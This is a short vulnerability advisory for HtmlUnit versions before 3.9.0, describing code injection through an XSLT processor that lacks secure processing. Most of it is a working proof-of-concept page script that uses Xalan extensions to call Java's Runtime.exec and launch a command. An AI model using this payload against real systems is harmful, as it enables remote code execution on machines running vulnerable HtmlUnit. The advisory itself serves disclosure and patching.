Improper Control of Generation of Code ('Code Injection') Affecting org.htmlunit:htmlunit package, versions [,3.9.0)

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') via the XSLT processor, due to FEATURE_SECURE_PROCESSING not being enabled. An attacker can execute arbitrary code remotely by directing the victim to browse a malicious webpage.

<script>
    var xslt = new ActiveXObject("Msxml2.XSLTemplate.6.0");
    var xslDoc = new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");
    var xslProc;
    xslDoc.async = false;
    xslDoc.loadXML(`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
   <xsl:template match="/">
     <xsl:variable name="rtobject" select="rt:getRuntime()"/>
     <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/>
     <xsl:variable name="processString" select="ob:toString($process)"/>
     <span><xsl:value-of select="$processString"/></span>
   </xsl:template>
 </xsl:stylesheet>`)

    if (xslDoc.parseError.errorCode != 0) {
        var myErr = xslDoc.parseError;
        document.write("ParseError: "+myErr.reason);
    } else {
        xslt.stylesheet = xslDoc;
        var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0");
        xmlDoc.async = false;
        xmlDoc.loadXML("<s></s>");
        if (xmlDoc.parseError.errorCode != 0) {
            var myErr = xmlDoc.parseError;
            document.write("Document error: " + myErr.reason);
        } else {
            xslProc = xslt.createProcessor();
            xslProc.input = xmlDoc;
            xslProc.transform();
            document.write(xslProc.output);
        }
    }
</script>

• GitHub Commit
• Release Notes